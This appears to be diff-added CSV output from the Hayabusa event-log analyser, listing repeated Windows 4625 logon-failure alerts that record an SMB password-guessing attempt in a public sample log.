+2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
